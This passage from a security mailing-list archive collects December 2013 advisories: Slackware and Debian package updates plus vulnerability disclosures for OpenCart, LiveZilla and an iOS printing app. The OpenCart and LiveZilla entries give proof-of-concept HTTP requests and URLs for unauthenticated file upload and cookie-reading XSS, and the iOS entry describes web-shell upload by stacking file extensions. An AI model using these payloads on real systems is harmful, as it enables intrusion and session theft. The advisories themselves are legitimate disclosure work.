1f33fbe3e18e0fbaf1190569fb9f8b9e  mozilla-thunderbird-17.0.11esr-x86_64-1_slack13.37.txz

Slackware 14.0 package:
8c2c55219d568e4cff9eda91b883f658  mozilla-thunderbird-17.0.11esr-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
b254f06d541562be63511312118400a4  mozilla-thunderbird-17.0.11esr-x86_64-1_slack14.0.txz

Slackware 14.1 package:
50fbdd06e503a5220e130927ae0e9171  mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
eb7196ac604d9fba90b8f71bc29ae0f9  mozilla-thunderbird-24.1.1-x86_64-1_slack14.1.txz

Slackware -current package:
4d2efed242da82ead7a3c19d19000aaa  xap/mozilla-thunderbird-24.1.1-i486-1.txz

Slackware x86_64 -current package:
7c40c6f86cec219dee61370fb1bfe007  xap/mozilla-thunderbird-24.1.1-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++


[slackware-security] seamonkey (SSA:2013-339-03)

2013-12-08 Thread Slackware Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  seamonkey (SSA:2013-339-03)

New seamonkey packages are available for Slackware 14.0, 14.1, and -current to
fix security issues.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/seamonkey-2.22.1-i486-1_slack14.1.txz:  Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
http://www.mozilla.org/security/known-vulnerabilities/seamonkey.html
  (* Security fix *)
patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.1.txz:  Upgraded.
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the Get Slack section on http://slackware.com for
additional mirror sites near you.

Updated packages for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-2.22.1-i486-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.0.txz

Updated packages for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-2.22.1-x86_64-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-solibs-2.22.1-x86_64-1_slack14.0.txz

Updated packages for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/seamonkey-2.22.1-i486-1_slack14.1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.1.txz

Updated packages for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/seamonkey-2.22.1-x86_64-1_slack14.1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/seamonkey-solibs-2.22.1-x86_64-1_slack14.1.txz

Updated packages for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/seamonkey-solibs-2.22.1-i486-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.22.1-i486-1.txz

Updated packages for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/seamonkey-solibs-2.22.1-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.22.1-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 packages:
b315acb9ea10513ff46123c075f82820  seamonkey-2.22.1-i486-1_slack14.0.txz
a53c11c7ab826f27815e89d1ae39f368  seamonkey-solibs-2.22.1-i486-1_slack14.0.txz

Slackware x86_64 14.0 packages:
97ee71cc5f91efd556ad29baa4695bb2  seamonkey-2.22.1-x86_64-1_slack14.0.txz
7eaab4ea075b79f0b67894e5b8fc8782  seamonkey-solibs-2.22.1-x86_64-1_slack14.0.txz

Slackware 14.1 packages:
9d2fddecd536ed84b76c7b134c440d77  seamonkey-2.22.1-i486-1_slack14.1.txz
50cb6c7e926a98552837e51294906d63  seamonkey-solibs-2.22.1-i486-1_slack14.1.txz

Slackware x86_64 14.1 packages:
f40c8b4207c4e4d2a521cc4cc0b17722  seamonkey-2.22.1-x86_64-1_slack14.1.txz
9e155f4b9a9f241030436926970002ca  seamonkey-solibs-2.22.1-x86_64-1_slack14.1.txz

Slackware -current packages:
b42a26ca28c58839abed995ad9962415  l/seamonkey-solibs-2.22.1-i486-1.txz
e1cab57251ca72b8cf82d6749959a1ea  xap/seamonkey-2.22.1-i486-1.txz

Slackware x86_64 -current packages:
7146b57158804ae43e644da69f3ca18a  l/seamonkey-solibs-2.22.1-x86_64-1.txz
153ebf91193138b897b66b581b6c57c1  xap/seamonkey-2.22.1-x86_64-1.txz


Installation instructions:
++

Upgrade the packages as root:
# upgradepkg seamonkey-2.22.1-i486-1_slack14.1.txz seamonkey-solibs-2.22.1-i486-1_slack14.1.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com



[slackware-security] hplip (SSA:2013-339-04)

2013-12-08 Thread Slackware Security Team

[slackware-security]  hplip (SSA:2013-339-04)

New hplip packages are available for Slackware 14.0 to fix a security issue.


Here are the details from the Slackware 14.0 ChangeLog:
+--+
patches/packages/hplip-3.12.9-i486-4_slack14.0.txz:  Rebuilt.
  This update disables the automatic upgrade feature which can be easily
  fooled into downloading an arbitrary binary and executing it.  This
  issue affects only Slackware 14.0 (earlier versions do not have the
  feature, and newer ones had already disabled it).
  For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6427
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the Get Slack section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/hplip-3.12.9-i486-4_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/hplip-3.12.9-x86_64-4_slack14.0.txz


MD5 signatures:
+-+

Slackware 14.0 package:
6838bc89361bf4dd0011ad4d46b98bf0  hplip-3.12.9-i486-4_slack14.0.txz

Slackware x86_64 14.0 package:
a5193660b2318e29aa5586ead1feb126  hplip-3.12.9-x86_64-4_slack14.0.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg hplip-3.12.9-i486-4_slack14.0.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com



Opencart Multiple Vulnerabilities

2013-12-08 Thread trueend5
###
# Title: Opencart Multiple Vulnerabilities
# Vendor: http://www.opencart.com
# Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure
# Vulnerable Version: opencart 1.5.6 (prior versions also may be affected)
# Exploitation: Remote with browser
# Impact: High
# Vendor Supplied Patch: N/A
# Original Advisory with Workaround: 
# http://www.garda.ir/Opencart_Multiple_Vulnerabilities.html
###


- Description:


Quote from vendor: OpenCart is a turn-key ready out of the box shopping cart 
solution.
You simply install, select your template, add products and you're ready to 
start accepting orders.



- Vulnerability:

In the process of optimizing our crawler engine by garda.ir (garda.ir is a 
Persian online shopping price comparison service which uses new search engine 
technologies to grab prices) we found a file upload vulnerability in the opencart 
application; further investigation led us to discover other vulnerabilities 
such as path disclosure and XSS.



- POC:


# 1
# File Upload
# Insufficient Authorization in /catalog/controller/product/product.php
# Result: testupload.txt.somehash is created in /download folder


POST /opencart-1.5.6/index.php?route=product/product/upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---4827543632391
Content-Length: 206
Connection: Keep-Alive

-----4827543632391
Content-Disposition: form-data; name="file"; filename="testupload.txt"
Content-Type: text/plain

testtesttest
-----4827543632391--


# 2
# Reflected XSS and Path Disclosure
# Input Validation Error in /catalog/controller/account/register.php
# Result: this will cause arbitrary scripting code to be executed by the
# target user's browser.

POST /opencart-1.5.6/index.php?route=account/register HTTP/1.1
Content-Type: multipart/form-data; boundary=---1e7a98bc645efbe7
Content-Length: 181
Host: example.com
Connection: Keep-Alive

-----1e7a98bc645efbe7
Content-Disposition: form-data; name="zone_id"

12345'+alert(document.cookie)+'
-----1e7a98bc645efbe7--


# 3
# Information Leakage – Path Disclosure
# Insufficient Authorization in /system/logs/error.txt 
# Result: Information Disclosure

http://www.example.com/opencart-1.5.6/system/logs/error.txt



- Solution:

There is no Vendor Supplied Patch at the time of this entry.
For workaround check the Original Advisory.



- Credit:

Discovered by: trueend5 (trueend5 [at] yahoo com)

This advisory is sponsored by garda.ir
http://www.garda.ir
A Persian online shopping price comparison service


[SECURITY] [DSA 2811-1] chromium-browser security update

2013-12-08 Thread Michael Gilbert
-------------------------------------------------------------------------
Debian Security Advisory DSA-2811-1                     secur...@debian.org
http://www.debian.org/security/                             Michael Gilbert
December 07, 2013                       http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: chromium-browser
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-6634 CVE-2013-6635 CVE-2013-6636 CVE-2013-6637 
 CVE-2013-6638 CVE-2013-6639 CVE-2013-6640

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2013-6634

Andrey Labunets discovered that the wrong URL was used during
validation in the one-click sign on helper.

CVE-2013-6635

cloudfuzzer discovered use-after-free issues in the InsertHTML and
Indent DOM editing commands.

CVE-2013-6636

Bas Venis discovered an address bar spoofing issue.

CVE-2013-6637

The chrome 31 development team discovered and fixed multiple issues
with potential security impact.

CVE-2013-6638

Jakob Kummerow of the Chromium project discovered a buffer overflow in
the v8 javascript library.

CVE-2013-6639

Jakob Kummerow of the Chromium project discovered an out-of-bounds
write in the v8 javascript library.

CVE-2013-6640

Jakob Kummerow of the Chromium project discovered an out-of-bounds
read in the v8 javascript library.

For the stable distribution (wheezy), these problems have been fixed in
version 31.0.1650.63-1~deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 31.0.1650.63-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



LiveZilla 5.1.0.0 Reflected XSS in translations

2013-12-08 Thread zoczus
Author: Jakub Zoczek [zoc...@gmail.com]
CVE Reference: CVE-2013-7002
Product: LiveZilla 
Vendor: LiveZilla GmbH [http://livezilla.net]
Affected version: 5.1.0.0
Severity: Medium
CVSSv2 Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 
Status: Fixed


0x01 Background

LiveZilla, the widely-used and trusted Live Help and Live Support System.

0x02 Description

LiveZilla in version 5.1.0.0 is prone to a Reflected Cross-Site Scripting issue 
in the translation PHP script used to generate JSON with connections between origin 
and destination languages. The content type is text/html and the g_language GET 
variable is displayed without sanitization, which makes the script vulnerable.

0x03 Proof of Concept

http://hostname/livezilla/mobile/php/translation/index.php?g_language=f;img 
src=a onerror=alert('XSS')h

0x04 Fix

Vulnerability was fixed in LiveZilla 5.1.1.0 version.

0x05 Timeline

20.11.2013 - Vendor notified
21.11.2013 - Fix released, vendor responded 
09.12.2013 - Public Disclosure


Print n Share v5.5 iOS - Multiple Web Vulnerabilities

2013-12-08 Thread Vulnerability Lab
Document Title:
===
Print n Share v5.5 iOS - Multiple Web Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1154


Release Date:
=
2013-12-06


Vulnerability Laboratory ID (VL-ID):

1154


Common Vulnerability Scoring System:

9.2


Product  Service Introduction:
===
Print directly to the widest range of network or WiFi printers, without a 
computer or AirPrint! Alternatively print 
via your Mac/PC to ALL printers including USB & Bluetooth printers. Print... 
documents, cloud files, web pages, emails, 
attachments, photos, contacts, calendars, clipboard items, convert to PDF and 
much more - to ANY PRINTER!

(Copy of the Homepage: 
https://itunes.apple.com/en/app/print-n-share-der-all-in-one/id301656026 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in the Print n Share v5.5 mobile application for apple iOS.


Vulnerability Disclosure Timeline:
==
2013-12-01:Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

EuroSmartz Ltd
Product: Print n Share 5.5


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details & Description:

1.1
A local file/path include web vulnerability has been discovered in the official 
Print n Share v5.5 mobile application for apple iOS.
The file include vulnerability allows remote attackers to include (upload) 
local file or path requests to compromise the application or service.

The remote file include web vulnerability is located in the import file module 
in the filename value. Remote attackers can inject their own files or 
path requests by adding regular text files (add). It is also possible to use 
the `rename` or `import` function to inject. The file include and 
path request execution occurs in the main file dir index or subcategory listing 
of the mobile application. The security risk of the local file 
include web vulnerability is estimated as high(+) with a cvss (common 
vulnerability scoring system) count of 8.4(+).

Exploitation of the local file include web vulnerability requires no user 
interaction or privileged web-application user account with password. 
Successful exploitation of the vulnerability results in unauthorized local file 
uploads and path requests to compromise the device or mobile app.

Request Method(s):
[+] [POST]

Vulnerable Inputs(s):
[+] Neue Text Datei (New Text File)
[+] Umbenennen File (Rename File)

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Dir Listing 
(http://localhost:8080)



1.2
An arbitrary file upload web vulnerability has been discovered in the official 
Print n Share v5.5 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with 
multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the import file module. Remote attackers are 
able to upload php or js web-shells by renaming the file with 
multiple extensions to bypass the file restriction mechanism. The attacker 
uploads for example a web-shell with the following name and extension 
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the 
file in the web application. He deletes the .jpg and .gif file 
extensions and can access the application with elevated access rights. The 
security risk of the arbitrary file upload web vulnerability is 
estimated as high with a cvss (common vulnerability scoring system) count of 
7.8(+).

Exploitation of the arbitrary file upload web vulnerability requires no user 
interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file 
access because of a compromise after the upload of web-shells.


Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] File Import

Vulnerable Inputs(s):
[+] Importieren - File & Sync

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] File Path Listing (http://localhost:8080)



1.3
A persistent input validation web vulnerability has been discovered in the 
official Print n Share v5.5 mobile application for apple iOS.
The (persistent) vulnerability allows remote attacker to inject own malicious 
script code on the application-side of the mobile application.

The